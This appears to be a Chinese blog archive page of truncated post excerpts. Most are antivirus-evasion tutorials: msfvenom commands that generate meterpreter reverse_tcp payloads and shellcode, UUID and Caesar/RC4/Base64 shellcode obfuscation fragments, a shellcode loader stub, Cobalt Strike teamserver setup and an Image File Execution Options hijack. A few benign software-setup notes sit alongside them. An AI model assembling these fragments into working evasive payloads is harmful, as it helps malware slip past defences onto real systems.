2022 年 12月 31 日随笔档案 - 瑞皇

2022年12月31日

摘要：远程线程注入生成一段Shellcode，用于弹出计算器，若注入成功，则弹出成功。 MSF命令如下：弹出计算器CALC msfvenom -p windows/exec cmd=calc.exe -f raw -o shellcode.bin 弹出CMD msfvenom -p windows/e 阅读全文

posted @ 2022-12-31 21:15 瑞皇阅读(452) 评论(0) 推荐(0) 编辑

逆向技巧——映像劫持，自动调试新进程

摘要：映像劫持，自动打开OD调试新进程第一步：进入注册表项计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options 第二步：新建项名字为新进程名字，带exe，如ab 阅读全文

posted @ 2022-12-31 17:26 瑞皇阅读(134) 评论(0) 推荐(0) 编辑

软件安装——Windows7 VmWare Tools

摘要： VMware Win7 这里有个坑，在安装VMtools的时候，是失败的，我原来以为是镜像的问题，Windows 7镜像版本如果比较低，是安装不了VMtools的。在尝试更换高版本Windows 7后，我发现不是版本的问题，而是VMware16的问题。以前用的VMware15，没有碰到这个问题。微软阅读全文

posted @ 2022-12-31 17:25 瑞皇阅读(754) 评论(0) 推荐(0) 编辑

软件安装——Windows Java配置

摘要： Windows Java配置 1、JAVA_HOME JAVA_HOME C:\Program Files\Java\jdk1.8.0_281 2、CLASSPATH CLASSPATH .;%JAVA_HOME%\lib\dt.jar;%JAVA_HOME%\lib\tools.jar; 3、pa 阅读全文

posted @ 2022-12-31 17:23 瑞皇阅读(37) 评论(0) 推荐(0) 编辑

软件安装——Windows gcc安装教程

摘要： Windows gcc安装教程 1、下载MinGW https://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download 2、安装点击继续一直下一步下载完后会打开一个界面叫 MinGW Instal 阅读全文

posted @ 2022-12-31 17:23 瑞皇阅读(191) 评论(0) 推荐(0) 编辑

windows基础知识——注册表

摘要：注册表注册表逻辑结构 HKEY_USER 存放本地计算机口令列表的用户标识和密码列表。存放每个用户的预配置信息。 HKEY_CURRENT_USER 存放的当前登录的用户信息，包括用户登录名和暂存的密码。 HKEY_CURRENT_CONFIG 存放定义当前用户的琢磨配置数据，最后使用的文档列表和阅读全文

posted @ 2022-12-31 17:19 瑞皇阅读(186) 评论(0) 推荐(0) 编辑

免杀——UUID回调函数免杀

摘要：生成UUID的Python脚本： import uuid shellcode=b"" list = [] for i in range(50): bytes_a = shellcode[i * 16: 16 + i * 16] b = uuid.UUID(bytes_le=bytes_a) list 阅读全文

posted @ 2022-12-31 15:45 瑞皇阅读(136) 评论(0) 推荐(0) 编辑

免杀——凯撒+RC4+Base64分离免杀

摘要： Shellcode生成器： buf是CS生成的Shellcode #include "Caesar.h" #include "Base64.h" #include "RC4.h" int main() { unsigned char buf[] = "" unsigned char* buf1; i 阅读全文

posted @ 2022-12-31 15:34 瑞皇阅读(197) 评论(0) 推荐(0) 编辑

免杀——msfvenom基本操作

摘要： MSF生成EXE： msfvenom -p 有效载荷 -f 输出格式 -o 输出文件 msfvenom -p windows/meterpreter/reverse_tcp -f exe -o payload.exe MSF生成Shellcode： msfvenom -a 系统架构 --platfo 阅读全文

posted @ 2022-12-31 15:30 瑞皇阅读(201) 评论(0) 推荐(0) 编辑

免杀——CobatStrike基本操作

摘要：安全测试中，将一台虚拟机作为服务器，同时也可以作为客户机。 1、将服务器打开 ./teamserver 192.168.204.148 kali 2、启动客户端中文插件打开： java -Dfile.encoding=UTF-8 -javaagent:CobaltStrikeCN.jar -XX: 阅读全文

posted @ 2022-12-31 14:46 瑞皇阅读(55) 评论(0) 推荐(0) 编辑

密码学——Base64编码

摘要：通过数据表替换，将6位拓展为8位，进行替换，总长度增加1/3。 #pragma once #include<stdio.h> #include<stdlib.h> #include <string.h> unsigned char* Base64_Encode(unsigned char* strI 阅读全文

posted @ 2022-12-31 14:28 瑞皇阅读(18) 评论(0) 推荐(0) 编辑

密码学——RC4

摘要：对称加密方法RC4 通过置换和流加密处理进行加密。 #pragma once #include<stdio.h> /* RC4初始化函数 */ void RC4_Init(unsigned char* s, unsigned char* key, unsigned long Len_k) { int 阅读全文

posted @ 2022-12-31 14:26 瑞皇阅读(47) 评论(0) 推荐(0) 编辑

密码学——凯撒加密

摘要：古典加密方案，通过对字符简单的增加x，来进行加密。免杀使用的时候，顺手可以加个亦或进去，增加点复杂度。 #pragma once #include<stdio.h> void Caesar_Encryption(unsigned char *strInput,int nLength, int nO 阅读全文

posted @ 2022-12-31 14:22 瑞皇阅读(72) 评论(0) 推荐(0) 编辑

免杀——直接加载

摘要：通过使用直接加载的方式来加载shellcode，是最初始的免杀手段。不过随着对抗的加剧，该方法现在已经不再实用。 #include <stdio.h> #include <stdlib.h> #pragma comment( linker, "/subsystem:\"windows\" /ent 阅读全文

posted @ 2022-12-31 14:18 瑞皇阅读(32) 评论(0) 推荐(0) 编辑

瑞皇

公告